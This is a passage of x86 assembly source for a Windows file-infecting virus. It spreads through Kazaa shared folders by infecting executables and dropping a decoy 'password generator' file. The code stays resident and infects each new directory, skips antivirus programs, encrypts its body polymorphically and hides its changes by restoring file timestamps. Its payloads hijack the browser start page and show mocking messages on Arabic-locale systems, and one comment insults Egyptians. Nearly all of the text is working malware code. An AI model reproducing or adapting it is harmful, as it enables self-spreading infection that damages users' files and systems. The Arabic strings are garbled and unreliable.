call clean_buff
|
||
mov eax, offset buff_
|
||
add eax,ebp
|
||
push eax
|
||
mov eax, offset buff
|
||
add eax,ebp
|
||
push eax
|
||
push 0
|
||
push 0
|
||
push 0 ;Default value
|
||
push dword ptr [ebp+HandleOpenedKey]
|
||
call [ebp+_RegQueryValueExA]
|
||
|
||
push dword ptr [ebp+HandleOpenedKey]
|
||
call [ebp+ _RegCloseKey]
|
||
mov esi,ebp
|
||
add esi,offset buff
|
||
push esi
|
||
loopsearch:
|
||
cmp dword ptr [esi],"exe."
|
||
je reached
|
||
cmp dword ptr [esi],"EXE."
|
||
je reached
|
||
inc esi
|
||
jmp loopsearch
|
||
reached:
|
||
add esi,4
|
||
push esi
|
||
pop edi
|
||
mov al,0
|
||
stosb
|
||
|
||
pop esi
|
||
first_loop:
|
||
mov ax,word ptr [esi+1]
|
||
cmp ax, "\:"
|
||
je skip_dec
|
||
inc esi
|
||
jmp first_loop
|
||
skip_dec:
|
||
mov edx,esi
|
||
call InfectFile
|
||
|
||
inc byte ptr [ebp+player]
|
||
jmp player_loop
|
||
@@End:
|
||
mov byte ptr [ebp+player],"a"
|
||
mov eax,offset HandleOpenedKey
|
||
add eax,ebp
|
||
push eax
|
||
push 000F003Fh ;KEY_ALL_ACCESS
|
||
push 0
|
||
call pushstring2
|
||
db "SOFTWARE\KAZAA\LocalContent",0
|
||
pushstring2:
|
||
push 80000002h ;HKEY_CURRENT_USER
|
||
call [ebp+ _RegOpenKeyExA]
|
||
or eax, eax
|
||
jnz @@@End
|
||
|
||
call clean_buff
|
||
mov eax,offset buff_
|
||
add eax,ebp
|
||
push eax
|
||
mov eax, offset buff
|
||
add eax,ebp
|
||
push eax
|
||
push 0
|
||
push 0
|
||
call pushvalue2
|
||
db "DownloadDir",0
|
||
pushvalue2:
|
||
push dword ptr [ebp+HandleOpenedKey]
|
||
call [ebp+_RegQueryValueExA]
|
||
|
||
push dword ptr [ebp+ HandleOpenedKey]
|
||
call [ebp+_RegCloseKey]
|
||
push ebp
|
||
mov eax,ebp
|
||
add eax,offset currdir
|
||
push eax
|
||
push L 128
|
||
call [_GetCurrentDirectoryA+ebp]
|
||
pop ebp
|
||
|
||
mov edx,ebp
|
||
add edx,offset buff
|
||
push edx
|
||
call [ebp+_SetCurrentDirectoryA]
|
||
|
||
call InfectCurrentDirectory
|
||
call dropfile
|
||
|
||
mov edx,ebp
|
||
add edx,offset currdir
|
||
push edx
|
||
call [ebp+_SetCurrentDirectoryA]
|
||
@@@End:
|
||
popad
|
||
ret
|
||
|
||
clean_buff:
|
||
pushad
|
||
mov edi,offset buff_
|
||
add edi,ebp
|
||
mov dword ptr [edi],030h
|
||
add edi,4
|
||
mov ecx,30h
|
||
mov al,0
|
||
rep stosb
|
||
popad
|
||
ret
|
||
|
||
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
; Drop a file in kazza's shared folder
|
||
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
|
||
dropfile:
|
||
mov edx,ebp
|
||
add edx,offset fileee
|
||
push edx
|
||
call [ebp+_GetFileAttributesA]
|
||
inc eax
|
||
or eax,eax
|
||
je makeit
|
||
ret
|
||
makeit:
|
||
push 0
|
||
push 0
|
||
push 1 ; Create new
|
||
push 0
|
||
push 0
|
||
push GENERIC_READ+GENERIC_WRITE
|
||
mov edx,ebp
|
||
add edx,offset fileee
|
||
push edx
|
||
call [ebp+_CreateFileA]
|
||
mov [ebp+hfile],eax
|
||
|
||
push 0
|
||
mov eax,4096 ;note that the filesize is hardcoded
|
||
push eax
|
||
push 0
|
||
push PAGE_READWRITE
|
||
push 0
|
||
push [ebp+hfile]
|
||
call [ebp+_CreateFileMappingA]
|
||
|
||
mov [ebp+hmap], eax
|
||
|
||
mov eax,4096
|
||
push eax
|
||
push 0
|
||
push 0
|
||
push 2 ;FILE_MAP_ALL_ACCESS
|
||
push [ebp+hmap]
|
||
call [ebp+_MapViewOfFile]
|
||
|
||
mov [ebp+haddress], eax
|
||
|
||
mov edi,eax
|
||
mov esi,ebp
|
||
add esi, offset dropstart
|
||
mov ecx,dropend-dropstart
|
||
nextat: ; Decompress compressed dropper
|
||
lodsb ; file, i would like to thank
|
||
or al,al ; Vecna for simple decompressor
|
||
jnz nextbit
|
||
dec ecx
|
||
dec ecx
|
||
push ecx
|
||
lodsw
|
||
xor ecx,ecx
|
||
mov cx,ax
|
||
mov al,0
|
||
rep stosb
|
||
pop ecx
|
||
loop nextat
|
||
jcxz quitta
|
||
nextbit:
|
||
stosb
|
||
loop nextat
|
||
quitta:
|
||
push [ebp+haddress]
|
||
call [ebp+_UnmapViewOfFile]
|
||
|
||
push [ebp+hmap]
|
||
call [ebp+_CloseHandle]
|
||
|
||
push [ebp+hfile]
|
||
call [ebp+_CloseHandle]
|
||
ret
|
||
|
||
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
; Get Kernel32 address, thanks billy !
|
||
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
|
||
GetK32:
|
||
_@1: jecxz WeFailed
|
||
mov cx,word ptr [esi]
|
||
xor cx,"4k"
|
||
cmp cx,"ZM"xor "4k"
|
||
jz CheckPE
|
||
_@2: sub esi,10000h
|
||
dec ecx
|
||
jmp _@1
|
||
CheckPE:
|
||
mov edi,[esi+3Ch]
|
||
add edi,esi
|
||
mov cx,word ptr [edi]
|
||
xor cx,"3a"
|
||
cmp cx,"EP"xor "3a"
|
||
jz WeGotK32
|
||
jmp _@2
|
||
WeFailed:
|
||
mov ecx,cs
|
||
xor cl,cl
|
||
jecxz WeAreInWNT
|
||
mov esi,kernel_
|
||
jmp WeGotK32
|
||
WeAreInWNT:
|
||
mov esi,kernel_wNT
|
||
WeGotK32:
|
||
xchg eax,esi
|
||
ret
|
||
|
||
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
; Get APIs , also thanks billy !
|
||
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
|
||
GetAPIs:
|
||
@@1: lodsd
|
||
push esi
|
||
push edi
|
||
call GetAPI_ET_CRC32
|
||
pop edi
|
||
pop esi
|
||
stosd
|
||
cmp byte ptr [esi],0BBh ; Last API?
|
||
jz @@4
|
||
jmp @@1
|
||
@@4: ret
|
||
|
||
GetAPI_ET_CRC32:
|
||
xor edx,edx
|
||
xchg eax,edx
|
||
mov word ptr [ebp+Counter],ax
|
||
mov esi,3Ch
|
||
add esi,[ebp+kernel]
|
||
lodsw
|
||
add eax,[ebp+kernel]
|
||
|
||
mov esi,[eax+78h]
|
||
add esi,1Ch
|
||
add esi,[ebp+kernel]
|
||
|
||
lea edi,[ebp+AddressTableVA]
|
||
lodsd
|
||
add eax,[ebp+kernel]
|
||
stosd
|
||
|
||
lodsd
|
||
add eax,[ebp+kernel]
|
||
push eax
|
||
stosd
|
||
|
||
lodsd
|
||
add eax,[ebp+kernel]
|
||
stosd
|
||
|
||
pop esi
|
||
|
||
@?_3: push esi
|
||
lodsd
|
||
add eax,[ebp+kernel]
|
||
xchg edi,eax
|
||
mov ebx,edi
|
||
|
||
push edi
|
||
xor al,al
|
||
scasb
|
||
jnz $-1
|
||
pop esi
|
||
|
||
sub edi,ebx
|
||
|
||
push edx
|
||
call CRC32
|
||
pop edx
|
||
cmp edx,eax
|
||
jz @?_4
|
||
|
||
pop esi
|
||
add esi,4
|
||
inc word ptr [ebp+Counter]
|
||
jmp @?_3
|
||
@?_4:
|
||
pop esi
|
||
movzx eax,word ptr [ebp+Counter]
|
||
shl eax,1
|
||
add eax,dword ptr [ebp+OrdinalTableVA]
|
||
xor esi,esi
|
||
xchg eax,esi
|
||
lodsw
|
||
shl eax,2
|
||
add eax,dword ptr [ebp+AddressTableVA]
|
||
xchg esi,eax
|
||
lodsd
|
||
add eax,[ebp+kernel]
|
||
ret
|
||
|
||
CRC32:
|
||
cld
|
||
xor ecx,ecx
|
||
dec ecx
|
||
mov edx,ecx
|
||
NextByteCRC:
|
||
xor eax,eax
|
||
xor ebx,ebx
|
||
lodsb
|
||
xor al,cl
|
||
mov cl,ch
|
||
mov ch,dl
|
||
mov dl,dh
|
||
mov dh,8
|
||
NextBitCRC:
|
||
shr bx,1
|
||
rcr ax,1
|
||
jnc NoCRC
|
||
xor ax,08320h
|
||
xor bx,0EDB8h
|
||
NoCRC: dec dh
|
||
jnz NextBitCRC
|
||
xor ecx,eax
|
||
xor edx,ebx
|
||
dec edi
|
||
jnz NextByteCRC
|
||
not edx
|
||
not ecx
|
||
mov eax,edx
|
||
rol eax,16
|
||
mov ax,cx
|
||
ret
|
||
|
||
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
; This is the virus resident part, it will detect directory
|
||
; change every 8 seconds and infect all files in the new one
|
||
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
|
||
VThread:
|
||
call get_delta
|
||
get_delta:
|
||
pop ebp
|
||
sub ebp,offset get_delta
|
||
|
||
@loophere:
|
||
mov eax,[ori_eip+ebp]
|
||
mov [tmp_eip+ebp],eax
|
||
call InfectCurrentDirectory
|
||
mov eax,[tmp_eip+ebp]
|
||
mov [ori_eip+ebp],eax
|
||
|
||
@sleepagain:
|
||
push 8000
|
||
call [ebp+_Sleep]
|
||
|
||
push ebp
|
||
mov eax,ebp
|
||
add eax,offset currdir
|
||
push eax
|
||
push L 128
|
||
call [_GetCurrentDirectoryA+ebp]
|
||
pop ebp
|
||
|
||
mov esi,ebp
|
||
mov edi,esi
|
||
add esi,offset currdir
|
||
add edi,offset olddir
|
||
xor ecx,ecx
|
||
mov cl,128
|
||
rep cmpsb
|
||
je @sleepagain
|
||
mov esi,ebp
|
||
mov edi,esi
|
||
add esi,offset currdir
|
||
add edi,offset olddir
|
||
xor ecx,ecx
|
||
mov cl,128
|
||
rep movsb
|
||
jmp @loophere
|
||
ret
|
||
|
||
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
; This will launch the virus resident part
|
||
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
|
||
LaunchVirusMainThread:
|
||
pushad
|
||
lea ebx,[ebp+offset ThreadID3]
|
||
push ebx
|
||
push 4h
|
||
push 0h
|
||
lea ebx,[ebp+offset VThread]
|
||
push ebx
|
||
push 0h
|
||
push 0h
|
||
call [ebp+_CreateThread]
|
||
or eax,eax
|
||
je @noway
|
||
push eax
|
||
|
||
push -1h ;low priority
|
||
push eax
|
||
call [ebp+_SetThreadPriority]
|
||
|
||
call [ebp+_ResumeThread]
|
||
@noway:
|
||
popad
|
||
ret
|
||
|
||
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
; Infect all EXE files in current directory
|
||
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
|
||
InfectCurrentDirectory:
|
||
push ebp
|
||
mov eax,offset wfd
|
||
add eax,ebp
|
||
push eax
|
||
mov eax,offset exe_match
|
||
add eax,ebp
|
||
xor [eax],"Shit"
|
||
push eax
|
||
call [_FindFirstFileA+ebp]
|
||
pop ebp
|
||
|
||
push eax
|
||
mov eax,offset exe_match
|
||
add eax,ebp
|
||
xor [eax],"Shit"
|
||
pop eax
|
||
|
||
inc eax
|
||
or eax,eax
|
||
je icd_end
|
||
dec eax
|
||
mov [search_handle+ebp],eax
|
||
|
||
mov edx,offset wfd.cFileName
|
||
add edx,ebp
|
||
call InfectFile
|
||
|
||
fnf_loop:
|
||
push ebp
|
||
mov eax,offset wfd
|
||
add eax,ebp
|
||
push eax
|
||
push [search_handle+ebp]
|
||
call [_FindNextFileA+ebp]
|
||
pop ebp
|
||
or eax,eax
|
||
je icd_end
|
||
mov edx,offset wfd.cFileName
|
||
add edx,ebp
|
||
call InfectFile
|
||
jmp fnf_loop
|
||
icd_end:
|
||
push [search_handle+ebp]
|
||
call [ebp+_FindClose]
|
||
ret
|
||
|
||
|
||
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
; Infects EXE file pointed to by EDX
|
||
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
InfectFile:
|
||
|
||
push edx ; Don't infect AVs , thanks
|
||
pop esi ; bumblebee ;)
|
||
lea edi,avStrings+ebp
|
||
mov ecx,vStringsCout
|
||
testIfAvL:
|
||
push esi
|
||
mov ax,word ptr [edi]
|
||
testAvLoop:
|
||
cmp word ptr [esi],ax
|
||
jne contTestLoop
|
||
pop esi
|
||
ret
|
||
contTestLoop:
|
||
inc esi
|
||
cmp byte ptr [esi+3],0
|
||
jne testAvLoop
|
||
pop esi
|
||
add edi,2
|
||
loop testIfAvL
|
||
|
||
push edx
|
||
push ebp
|
||
mov eax,offset wfd
|
||
add eax,ebp
|
||
push eax
|
||
push edx
|
||
call [_FindFirstFileA+ebp]
|
||
pop ebp
|
||
|
||
push eax
|
||
call [ebp+_FindClose]
|
||
|
||
mov edx, [ebp+wfd.dwFileAttributes]
|
||
test edx, 800h ; Avoid compressed
|
||
je conttt ; files
|
||
pop edx
|
||
ret
|
||
conttt:
|
||
|
||
test edx,4h
|
||
je contttt
|
||
pop edx
|
||
ret
|
||
contttt:
|
||
pop edx
|
||
mov esi,edx
|
||
mov edi,ebp
|
||
add edi,offset wfd.cFileName
|
||
@morecopy:
|
||
lodsb
|
||
stosb
|
||
cmp al,0
|
||
jne @morecopy
|
||
|
||
lea esi,[ebp+wfd.cFileName]
|
||
push 80h
|
||
push edx
|
||
apicall _SetFileAttributesA
|
||
|
||
call OpenFile
|
||
|
||
cmp_ eax,CantOpen
|
||
|
||
mov dword ptr [ebp+FileHandle],eax
|
||
|
||
mov ecx,dword ptr [ebp+wfd.nFileSizeLow]
|
||
call CreateMap
|
||
cmp_ eax,CloseFile
|
||
|
||
mov dword ptr [ebp+MapHandle],eax
|
||
|
||
mov ecx,dword ptr [ebp+wfd.nFileSizeLow]
|
||
call MapFile
|
||
cmp_ eax,UnMapFile
|
||
|
||
mov dword ptr [ebp+MapAddress],eax
|
||
|
||
mov esi,eax
|
||
|
||
mov esi,[esi+3Ch]
|
||
add esi,eax
|
||
mov ecx,dword ptr [esi];
|
||
xor cx,"7f"
|
||
cmp cx,"EP"xor"7f"
|
||
jnz NoInfect
|
||
test word ptr [esi+16h],2000h ; Don't infect dlls
|
||
jnz NoInfect
|
||
|
||
cmp dword ptr [esi+mark],012345678h ; Was it infected?
|
||
jz NoInfect
|
||
|
||
push dword ptr [esi+3Ch]
|
||
|
||
push dword ptr [ebp+MapAddress]
|
||
apicall _UnmapViewOfFile
|
||
|
||
push dword ptr [ebp+MapHandle]
|
||
apicall _CloseHandle
|
||
|
||
pop ecx
|
||
|
||
mov eax,dword ptr [ebp+wfd.nFileSizeLow]
|
||
add eax,[ebp+viruslen]
|
||
|
||
call Align
|
||
xchg ecx,eax
|
||
|
||
call CreateMap
|
||
cmp_ eax,CloseFile
|
||
|
||
mov dword ptr [ebp+MapHandle],eax
|
||
|
||
mov ecx,dword ptr [ebp+NewSize]
|
||
call MapFile
|
||
cmp_ eax,UnMapFile
|
||
|
||
mov dword ptr [ebp+MapAddress],eax
|
||
|
||
; I would like to thank billy for the PE infection algorithm
|
||
|
||
mov esi,eax
|
||
|
||
mov esi,[esi+3Ch]
|
||
add esi,eax
|
||
|
||
mov edi,esi
|
||
|
||
movzx eax,word ptr [edi+06h]
|
||
dec eax
|
||
imul eax,eax,28h
|
||
add esi,eax
|
||
add esi,78h
|
||
mov edx,[edi+74h]
|
||
shl edx,3
|
||
add esi,edx
|
||
|
||
mov eax,[edi+28h]
|
||
mov dword ptr [ebp+ori_eip],eax
|
||
|
||
mov edx,[esi+10h]
|
||
mov ebx,edx
|
||
add edx,[esi+14h]
|
||
|
||
push edx
|
||
|
||
mov eax,ebx
|
||
|
||
add eax,[esi+0Ch]
|
||
mov [edi+28h],eax
|
||
mov dword ptr [ebp+NewEIP],eax
|
||
|
||
mov eax,[esi+10h]
|
||
add eax,[ebp+viruslen]
|
||
mov ecx,[edi+3Ch]
|
||
call Align
|
||
|
||
mov [esi+10h],eax
|
||
mov [esi+08h],eax
|
||
|
||
pop edx
|
||
|
||
mov eax,[esi+10h]
|
||
add eax,[esi+0Ch]
|
||
mov [edi+50h],eax
|
||
|
||
or dword ptr [esi+24h],section_flags
|
||
mov dword ptr [edi+mark],012345678h
|
||
|
||
lea esi,[ebp+code_start]
|
||
xchg edi,edx
|
||
add edi,dword ptr [ebp+MapAddress]
|
||
mov [ebp+fromhere], edi
|
||
mov ecx, enc-code_start ; code_len
|
||
rep movsb
|
||
|
||
no_null_key:
|
||
call random32
|
||
cmp al,0ffh
|
||
je no_null_key ; Avoid 0 keys
|
||
cmp ah,068h
|
||
je no_null_key
|
||
mov byte ptr[ebp+key2],al
|
||
xor byte ptr[ebp+key2],0ffh
|
||
mov bl,al
|
||
mov byte ptr [ebp+key],ah
|
||
xor byte ptr [ebp+key],068h
|
||
mov ecx,enc_end-enc
|
||
@enc_loop:
|
||
lodsb
|
||
sub al,bl
|
||
neg al
|
||
ror al,1
|
||
not al
|
||
neg al
|
||
xor al,ah
|
||
stosb
|
||
dec ecx
|
||
or ecx,ecx
|
||
jne @enc_loop
|
||
|
||
mov ecx,code_end-enc_end
|
||
rep movsb
|
||
pushad
|
||
mov edi,[ebp+fromhere]
|
||
add edi,poly_enc-code_start
|
||
mov ecx,((poly_end-poly_enc)/4)+1
|
||
mov eax,dword ptr[ebp+keyy]
|
||
polyenc_loop:
|
||
xor dword ptr [edi],eax
|
||
add edi,4h
|
||
dec ecx
|
||
cmp ecx,0h
|
||
jne polyenc_loop
|
||
popad
|
||
mov ecx,[ebp+dec_len]
|
||
mov esi,[ebp+decplace]
|
||
rep movsb ; now copy the poly decryptor
|
||
|
||
jmp UnMapFile
|
||
|
||
NoInfect:
|
||
dec byte ptr [ebp+infections]
|
||
mov ecx,dword ptr [ebp+wfd.nFileSizeLow]
|
||
call TruncFile
|
||
|
||
UnMapFile:
|
||
push dword ptr [ebp+MapAddress]
|
||
apicall _UnmapViewOfFile
|
||
|
||
CloseMap:
|
||
push dword ptr [ebp+MapHandle]
|
||
apicall _CloseHandle
|
||
|
||
CloseFile:
|
||
mov eax,ebp
|
||
add eax,offset wfd.ftCreationTime
|
||
push eax
|
||
add eax,8
|
||
push eax
|
||
add eax,8
|
||
push eax
|
||
push dword ptr [ebp+FileHandle]
|
||
apicall _SetFileTime
|
||
|
||
push dword ptr [ebp+FileHandle]
|
||
apicall _CloseHandle
|
||
|
||
CantOpen:
|
||
push dword ptr [ebp+wfd.dwFileAttributes]
|
||
lea eax,[ebp+wfd.cFileName]
|
||
push eax
|
||
apicall _SetFileAttributesA
|
||
ret
|
||
Align:
|
||
push edx
|
||
xor edx,edx
|
||
push eax
|
||
div ecx
|
||
pop eax
|
||
sub ecx,edx
|
||
add eax,ecx
|
||
pop edx
|
||
ret
|
||
|
||
TruncFile:
|
||
xor eax,eax
|
||
push eax
|
||
push eax
|
||
push ecx
|
||
push dword ptr [ebp+FileHandle]
|
||
apicall _SetFilePointer
|
||
|
||
push dword ptr [ebp+FileHandle]
|
||
apicall _SetEndOfFile
|
||
ret
|
||
|
||
OpenFile:
|
||
xor eax,eax
|
||
push eax
|
||
push eax
|
||
push 00000003h
|
||
push eax
|
||
inc eax
|
||
push eax
|
||
push 80000000h or 40000000h
|
||
push edx ;esi
|
||
apicall _CreateFileA
|
||
ret
|
||
|
||
CreateMap:
|
||
xor eax,eax
|
||
push eax
|
||
push ecx
|
||
push eax
|
||
push 00000004h
|
||
push eax
|
||
push dword ptr [ebp+FileHandle]
|
||
apicall _CreateFileMappingA
|
||
ret
|
||
|
||
MapFile:
|
||
xor eax,eax
|
||
push ecx
|
||
push eax
|
||
push eax
|
||
push 00000002h
|
||
push dword ptr [ebp+MapHandle]
|
||
apicall _MapViewOfFile
|
||
ret
|
||
|
||
;;;;;;;;;;;;;;;;;
|
||
; Get System Time
|
||
;;;;;;;;;;;;;;;;;
|
||
VxGetSystemTime:
|
||
push ebp
|
||
mov eax,offset st
|
||
add eax,ebp
|
||
push eax
|
||
call [_GetSystemTime+ebp]
|
||
pop ebp
|
||
ret
|
||
|
||
;;;;;;;;;;;;;;;;;;
|
||
; Get ModuleHandle
|
||
;;;;;;;;;;;;;;;;;;
|
||
VxGetModuleHandle:
|
||
push ebp
|
||
push eax
|
||
call [_GetModuleHandleA+ebp]
|
||
pop ebp
|
||
ret
|
||
|
||
;;;;;;;;;;;;;;;;;
|
||
; Get ProcAddress
|
||
;;;;;;;;;;;;;;;;;
|
||
VxGetProcAddress:
|
||
push ebp
|
||
push edx
|
||
push eax
|
||
call [_GetProcAddress+ebp]
|
||
pop ebp
|
||
ret
|
||
|
||
payload:
|
||
call [ebp+_GetSystemDefaultLCID]
|
||
and eax, 0FFFFh
|
||
cmp eax, 0c01h ; Arabic (egypt) ?
|
||
je arabic_payload
|
||
call VxGetSystemTime
|
||
cmp word ptr [ebp+wDayOfWeek], 5 ; friday
|
||
jnz @@Endp
|
||
cmp word ptr [ebp+wDay], 7
|
||
jbe @@DoPayload
|
||
cmp word ptr [ebp+wDay], 14
|
||
jbe @@Endp
|
||
cmp word ptr [ebp+wDay], 21
|
||
ja @@Endp
|
||
@@DoPayload:
|
||
lea eax, [ebp+HandleOpenedKey]
|
||
push eax
|
||
push 000F003Fh
|
||
push 0
|
||
lea eax, [ebp+IExplorerKey]
|
||
push eax
|
||
push HKEY_CURRENT_USER
|
||
call dword ptr [ebp+_RegOpenKeyExA]
|
||
or eax, eax
|
||
jnz @@Endp
|
||
push pagesize
|
||
lea eax, [ebp+page]
|
||
push eax
|
||
push 1
|
||
push 0
|
||
lea eax, [ebp+IExplorerValue]
|
||
push eax
|
||
push dword ptr [ebp+HandleOpenedKey]
|
||
call dword ptr [ebp+_RegSetValueExA]
|
||
|
||
push dword ptr [ebp+HandleOpenedKey]
|
||
call dword ptr [ebp+_RegCloseKey] ; Close key handle
|
||
@@Endp:
|
||
ret
|
||
|
||
arabic_payload:
|
||
mov eax,100
|
||
call rndeax
|
||
cmp eax,3 ; a 4% probability of msg
|
||
jbe doit
|
||
ret
|
||
doit:
|
||
mov eax,((offset offsets_end-offsets)/4)-1
|
||
call rndeax
|
||
shl eax,2
|
||
add eax,ebp
|
||
add eax,offset offsets
|
||
|
||
push MB_ICONEXCLAMATION
|
||
mov ebx,ebp
|
||
add ebx,offset delta
|
||
push ebx
|
||
mov eax, dword ptr [eax]
|
||
add eax,ebp
|
||
push eax
|
||
push L 0
|
||
call [_MessageBoxA+ebp]
|
||
ret
|
||
|
||
|
||
;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
;Random Number generators
|
||
;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
rndeax:
|
||
push edx
|
||
push ecx
|
||
xor edx,edx
|
||
push eax
|
||
call random32
|
||
pop ecx
|
||
div ecx
|
||
xchg eax, edx
|
||
pop ecx
|
||
pop edx
|
||
ret
|
||
|
||
irandom32:
|
||
call VxGetSystemTime
|
||
mov ax,word ptr [st.wMilliseconds +ebp]
|
||
shl eax,8
|
||
mov dword ptr [ebp+lastrnd],eax
|
||
ret
|
||
|
||
random32:
|
||
push ecx
|
||
xor ecx, ecx
|
||
mov eax, dword ptr [ebp+lastrnd]
|
||
mov cx, 33
|
||
|
||
rloop:
|
||
add eax, eax
|
||
jnc $+4
|
||
xor al, 197
|
||
loop rloop
|
||
mov dword ptr [ebp+lastrnd], eax
|
||
pop ecx
|
||
ret
|
||
|
||
lastrnd dd 0h
|
||
|
||
;;;;;;;;;;;;
|
||
; Data stuff
|
||
;;;;;;;;;;;;
|
||
a32_string db "ADVAPI32.dll",0
|
||
regopen_string db "RegOpenKeyExA",0
|
||
regget_string db "RegQueryValueExA",0
|
||
close_string db "RegCloseKey",0
|
||
Regset db "RegSetValueExA",0
|
||
u32_string db "USER32.dll",0
|
||
msgbox_string db "MessageBoxA",0
|
||
|
||
part2 db "\shell\open\command",0
|
||
part2_len equ $-offset part2
|
||
|
||
prog_itself db "Applications\"
|
||
prog_buffer db 100h dup (0)
|
||
|
||
desktop db "\Desktop",0
|
||
|
||
|
||
fileee db "BaNGBUS RaNDOM PASSWORD GENERATOR.EXE",0
|
||
; Could you have resisted such a file on kazaa ? ;)
|
||
|
||
avStrings dw 'VA','NA','RD','DI','DO','BT','-F'
|
||
vStringsCout equ (offset $-offset avStrings)/2
|
||
|
||
page db 'http://www.touregypt.net',0
|
||
|
||
; Yeah , Come and visit egypt, beautiful country with asshole people ;-)
|
||
|
||
pagesize equ $ - offset page
|
||
|
||
IExplorerKey db 'Software\Microsoft\Internet Explorer\Main',0
|
||
IExplorerValue db 'Start Page',0
|
||
|
||
lnk_match db "*.LNK",0
|
||
exe_match dd "XE.*" xor "Shit" ; *.EXE
|
||
db "E",0
|
||
|
||
|
||
kernel32 dd 0BFF70000h
|
||
@@NamezCRC32 label byte
|
||
@FindFirstFileA dd 0AE17EBEFh
|
||
@FindNextFileA dd 0AA700106h
|
||
@FindClose dd 0C200BE21h
|
||
@CreateFileA dd 08C892DDFh
|
||
@DeleteFileA dd 0DE256FDEh
|
||
@SetFilePointer dd 085859D42h
|
||
@SetFileAttributesA dd 03C19E536h
|
||
@CloseHandle dd 068624A9Dh
|
||
@GetCurrentDirectoryA dd 0EBC6C18Bh
|
||
@SetCurrentDirectoryA dd 0B2DBD7DCh
|
||
@GetWindowsDirectoryA dd 0FE248274h
|
||
@GetSystemDirectoryA dd 0593AE7CEh
|
||
@CreateFileMappingA dd 096B2D96Ch
|
||
@MapViewOfFile dd 0797B49ECh
|
||
@UnmapViewOfFile dd 094524B42h
|
||
@SetEndOfFile dd 059994ED6h
|
||
@GetProcAddress dd 0FFC97C1Fh
|
||
@LoadLibraryA dd 04134D1ADh
|
||
@GetSystemTime dd 075B7EBE8h
|
||
@GetModuleHandleA dd 082b618d4h
|
||
@WriteFile dd 021777793h
|
||
@GetFileSize dd 0ef7d811bh
|
||
@GetFileAttributesA dd 0c633d3deh
|
||
@VirtualAlloc dd 04402890eh
|
||
@Sleep dd 00ac136bah
|
||
@CreateThread dd 019f33607h
|
||
@SetThreadPriority dd 01e533f17h
|
||
@ResumeThread dd 06087961bh
|
||
@lstrcmp dd 06ae4253bh
|
||
@lstrcpy dd 0afd8ae51h
|
||
@GetSystemDefaultLCID dd 04b410542h
|
||
@SetFileTime dd 04B2A3E7Dh
|
||
db 0BBh
|
||
offsets:
|
||
dd offset @1
|
||
dd offset @2
|
||
dd offset @3
|
||
dd offset @4
|
||
dd offset @5
|
||
dd offset @6
|
||
dd offset @7
|
||
dd offset @8
|
||
dd offset @9
|
||
dd offset @10
|
||
dd offset @11
|
||
dd offset @12
|
||
dd offset @13
|
||
dd offset @14
|
||
dd offset @15
|
||
dd offset @16
|
||
dd offset @17
|
||
dd offset @18
|
||
dd offset @19
|
||
dd offset @20
|
||
offsets_end:
|
||
|
||
; Funny messages in arabic for the arabic payload
|
||
; you will not probably find them funny at all but they
|
||
; make sense in arabic ;)
|
||
|
||
@1 db "<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><> <20><><EFBFBD><EFBFBD><EFBFBD> ",0
|
||
; Is he speaking english , Morsi ?
|
||
@2 db "<22><><EFBFBD><EFBFBD> <20><> <20><><EFBFBD>Ϳ ",0
|
||
; Did you aim at it , smartie ?
|
||
@3 db "! <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>",0
|
||
; It's all because i have a one hair !
|
||
@4 db "<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><> <20><><EFBFBD><EFBFBD> <20>",0
|
||
; Who is it ? Mr Lotfi?! I can't believe it !
|
||
@5 db "! <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD> <20><> <20><><EFBFBD> <20><> <20><><EFBFBD><EFBFBD> <20><><EFBFBD>",0
|
||
; Please Tafida, you know that i love you so much, but i don't
|
||
; support your mother !
|
||
@6 db "<22> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD> <20> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>",0
|
||
; What's up with you Hamdi ? i already told you i am engaged
|
||
@7 db "! <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD> <20><><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD>",0
|
||
; Don't Cry your heart out, Tahani !
|
||
@8 db "<22><><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><> <20><><EFBFBD>",0
|
||
; How do you dare talk to me in such a manner, kid ?
|
||
